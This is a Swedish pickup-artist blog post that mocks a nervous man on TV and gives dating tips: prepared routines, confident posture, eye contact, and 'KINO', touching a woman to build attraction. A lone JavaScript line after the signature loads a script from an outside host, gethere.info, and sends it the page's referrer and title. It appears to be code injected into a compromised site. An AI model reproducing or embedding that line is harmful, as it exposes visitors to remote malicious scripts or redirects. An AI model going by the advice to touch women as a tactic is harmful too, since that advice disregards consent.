Börja med att kolla in följande klipp…

Jag hoppas att du led lika mycket som jag när du kollade på det. Det skar i hela kroppen på mig när jag såg hur osäker den här stackars saten var när han helt plötsligt ställdes inför uppgiften att föra en normal social interaktion med en kvinna. I FEM MINUTER!

Det är inte hjärnkirurgi, men ändå har många killar någon gång varit där. Rösten sviktar, händerna skakar, munnen blir torr som sand och hjärnan är tom som en stenöken. Nu hoppas jag att de flesta slipper att bli så totalt genompinsamma som den här killen, och att de dessutom slipper bli det på nationell TV…

Men även fast jag känner med den här killen och tycker lite synd om honom så blir jag lite sned på ett annat plan. Det är för fan hans uppgift att se till att den där tystnaden inte uppstår! Det är hans och ingen annans fel att den gör det.

Hur ska han göra då? Här kommer några tips för att göra en interaktion mer intressant och livlig:

- Ha intressanta saker att prata om ”i beredskap”! Öva inte in en konversation i förväg, men se till att du har några bra ”rutiner” och/eller historier för att göra det mer intressant. Är de rätt uppbyggda är de dessutom mycket bra sätt att skapa attraktion!

- Håll din kropp självsäkert! Sitt tillbakalutad, med axlarna bakåt och prata med stadig röst. Jag skiter i hur nervös du är på insidan, projicera det inte utåt!

- KINO! Rör vid henne, även om det bara är lekfullt genom en klapp på axeln eller en lätt kram. Beröring är enormt viktigt för människor, framförallt för att skapa attraktion…

- Ögonkontakt. Sitt inte och stirra ned i golvet eller i bordet, det är ett undergivet mesbeteende. Titta henne i ögonen och ha stadig ögonkontakt. Låt henne bryta den först… (stirra inte, dock)

Låter det som väldigt generella tips? Det är det…och det är bara toppen på isberget, men det är en bra början för killen som sitter och jämrar stammande framför en tjej.

Titta in på forumet om du är intresserad av EXAKT hur man ska bete sig för att attrahera kvinnor, det finns hur mycket som helst att lära sig. Jag vet att den stackars bonden hade kunnat vara en helt annan man med vår hjälp…

-Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;